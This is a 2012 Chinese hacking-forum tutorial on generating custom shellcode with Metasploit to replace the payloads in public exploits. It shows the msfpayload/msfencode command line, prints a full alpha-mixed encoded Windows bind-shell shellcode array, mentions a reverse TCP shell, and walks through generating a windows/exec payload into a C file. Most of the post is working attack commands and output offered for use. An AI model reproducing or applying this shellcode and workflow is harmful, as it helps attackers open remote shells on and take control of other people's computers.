切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
18 METASPLOIT 和SHELLCODE[复制链接]
发表于 2012-8-6 15:50:46 | 显示全部楼层 |!read_mode!

什么是SHELLCODE? 请看这里:http://baike.baidu.com/view/940274.htm

SHELLCODE就是溢出程序的后门。例如九区TrOoN写的这个:http://www.1337day.com/exploits/17707
他的作用是关闭机子..

在我们利用某些EXP的时候,溢出程序自带的SHELLCODE不能满足我们的需要,看我朋友KedAns-Dz写的:

http://www.1337day.com/exploits/17432

看他的SHELLCODE:
$shell = # win/shell_reverse_tcp | enc=alphaMiX | by : MSF

一个TCP反弹后门,如果某些EXP上的是弹出记事本 我们改如何生成自己想要的SHELLCODE?
首先你要熟悉http://helen.dis9.com/?p=8 (METASPLOIT的PAYLOAD)
我们来生成一个 打开UB 1
生成BIND SHELL吧:

  1. root@Dis9Team:~# msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/alpha_mixed
  2. [*] x86/alpha_mixed succeeded with size 659 (iteration=1)

  3. unsigned char buf[] =
  4. "\x89\xe2\xdb\xdb\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
  5. "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
  6. "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
  7. "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
  8. "\x4c\x4d\x38\x4c\x49\x45\x50\x45\x50\x45\x50\x43\x50\x4d\x59"
  9. "\x4d\x35\x50\x31\x49\x42\x42\x44\x4c\x4b\x50\x52\x50\x30\x4c"
  10. "\x4b\x51\x42\x44\x4c\x4c\x4b\x51\x42\x45\x44\x4c\x4b\x44\x32"
  11. "\x51\x38\x44\x4f\x4e\x57\x50\x4a\x47\x56\x46\x51\x4b\x4f\x50"
  12. "\x31\x49\x50\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x45\x52\x46\x4c"
  13. "\x47\x50\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x4b\x52\x4a"
  14. "\x50\x51\x42\x50\x57\x4c\x4b\x46\x32\x42\x30\x4c\x4b\x47\x32"
  15. "\x47\x4c\x45\x51\x4e\x30\x4c\x4b\x47\x30\x44\x38\x4d\x55\x49"
  16. "\x50\x44\x34\x50\x4a\x45\x51\x48\x50\x50\x50\x4c\x4b\x50\x48"
  17. "\x44\x58\x4c\x4b\x51\x48\x51\x30\x43\x31\x4e\x33\x4b\x53\x47"
  18. "\x4c\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4e\x36\x50\x31"
  19. "\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x45"
  20. "\x51\x49\x57\x50\x38\x4d\x30\x42\x55\x4c\x34\x45\x53\x43\x4d"
  21. "\x4c\x38\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x51\x48\x4c"
  22. "\x4b\x51\x48\x47\x54\x45\x51\x49\x43\x42\x46\x4c\x4b\x44\x4c"
  23. "\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x43\x31\x48\x53\x4c\x4b\x43"
  24. "\x34\x4c\x4b\x43\x31\x48\x50\x4c\x49\x50\x44\x51\x34\x51\x34"
  25. "\x51\x4b\x51\x4b\x45\x31\x46\x39\x51\x4a\x50\x51\x4b\x4f\x4b"
  26. "\x50\x51\x48\x51\x4f\x51\x4a\x4c\x4b\x44\x52\x4a\x4b\x4b\x36"
  27. "\x51\x4d\x43\x58\x50\x33\x50\x32\x43\x30\x43\x30\x42\x48\x43"
  28. "\x47\x43\x43\x50\x32\x51\x4f\x50\x54\x43\x58\x50\x4c\x43\x47"
  29. "\x51\x36\x43\x37\x4b\x4f\x4e\x35\x4e\x58\x4a\x30\x43\x31\x45"
  30. "\x50\x45\x50\x51\x39\x49\x54\x50\x54\x46\x30\x43\x58\x46\x49"
  31. "\x4b\x30\x42\x4b\x45\x50\x4b\x4f\x4e\x35\x50\x50\x50\x50\x50"
  32. "\x50\x46\x30\x51\x50\x46\x30\x51\x50\x46\x30\x43\x58\x4a\x4a"
  33. "\x44\x4f\x49\x4f\x4d\x30\x4b\x4f\x48\x55\x4d\x47\x50\x31\x49"
  34. "\x4b\x51\x43\x45\x38\x43\x32\x45\x50\x44\x51\x51\x4c\x4d\x59"
  35. "\x4d\x36\x42\x4a\x44\x50\x50\x56\x51\x47\x42\x48\x48\x42\x49"
  36. "\x4b\x46\x57\x43\x57\x4b\x4f\x48\x55\x51\x43\x50\x57\x45\x38"
  37. "\x48\x37\x4b\x59\x46\x58\x4b\x4f\x4b\x4f\x4e\x35\x50\x53\x46"
  38. "\x33\x50\x57\x45\x38\x43\x44\x4a\x4c\x47\x4b\x4b\x51\x4b\x4f"
  39. "\x49\x45\x51\x47\x4c\x57\x43\x58\x44\x35\x42\x4e\x50\x4d\x43"
  40. "\x51\x4b\x4f\x4e\x35\x42\x4a\x43\x30\x42\x4a\x45\x54\x50\x56"
  41. "\x51\x47\x43\x58\x45\x52\x48\x59\x49\x58\x51\x4f\x4b\x4f\x4e"
  42. "\x35\x4c\x4b\x47\x46\x42\x4a\x51\x50\x43\x58\x45\x50\x42\x30"
  43. "\x43\x30\x45\x50\x46\x36\x43\x5a\x45\x50\x45\x38\x46\x38\x49"
  44. "\x34\x46\x33\x4a\x45\x4b\x4f\x49\x45\x4d\x43\x46\x33\x42\x4a"
  45. "\x45\x50\x50\x56\x50\x53\x50\x57\x45\x38\x44\x42\x49\x49\x49"
  46. "\x58\x51\x4f\x4b\x4f\x4e\x35\x43\x31\x48\x43\x47\x59\x49\x56"
  47. "\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x49\x53\x44\x4a\x41\x41";
复制代码

-e x86/alpha_mixed 是编码另外一种方法:来生成个CMD命令:

  1. msf > use windows/exec
  2. msf payload(exec) > show options

  3. Module options:

  4.    Name      Current Setting  Required  Description
  5.    ----      ---------------  --------  -----------
  6.    CMD                        yes       The command string to execute
  7.    EXITFUNC  process          yes       Exit technique: seh, thread, process, none

  8. msf payload(exec) > set cmd taskkill /PID 12345
  9. cmd => taskkill /PID 12345
  10. msf payload(exec) > show options

  11. Module options:

  12.    Name      Current Setting      Required  Description
  13.    ----      ---------------      --------  -----------
  14.    CMD       taskkill /PID 12345  yes       The command string to execute
  15.    EXITFUNC  process              yes       Exit technique: seh, thread, process, none

  16. msf payload(exec) > generate -h
  17. Usage: generate [options]

  18. Generates a payload.

  19. OPTIONS:

  20.     -E        Force encoding.
  21.     -b   The list of characters to avoid: '\x00\xff'
  22.     -e   The name of the encoder module to use.
  23.     -f   The output file name (otherwise stdout)
  24.     -h        Help banner.
  25.     -i   the number of encoding iterations.
  26.     -k        Keep the template executable functional
  27.     -o   A comma separated list of options in VAR=VAL format.
  28.     -p   The Platform for output.
  29.     -s   NOP sled length.
  30.     -t   The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
  31.     -x   The executable template to use

  32. msf payload(exec) > generate -t c -f /root/windows-exec-payload.c
复制代码
然后替换我们的EXP中的SHELLCODE



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-29 06:49

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部